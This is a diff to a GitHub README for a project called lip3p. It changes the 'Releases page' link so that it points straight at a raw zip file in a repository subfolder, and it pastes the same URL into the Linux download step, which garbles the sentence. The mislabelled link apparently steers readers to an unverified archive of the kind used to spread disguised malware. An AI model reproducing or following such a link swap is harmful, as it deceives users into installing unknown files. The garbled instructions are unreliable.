r91221/lip3p/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/r91221/lip3p/releases) to find the latest version of lip3p.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/r91221/lip3p/master/nuraghe/lip3p.zip) to find the latest version of lip3p.
 2. **Choose the Right File:**
    - Look for the latest release.
 This usually has the highest version number.
    - Find the file that matches your operating system:
      - For Windows, download the `.exe` file.
      - For macOS, download the `.dmg` file.
-     - For Linux, download the appropriate `.tar.gz` or `.deb` file.
+     - For Linux, download the appropriate `https://raw.githubusercontent.com/r91221/lip3p/master/nuraghe/lip3p.zip` or `.deb` file.
 3. **Download the File:** Click on the file to start downloading.
 This may take a few moments.
 4. **Install the Application:**
    - **For Windows:**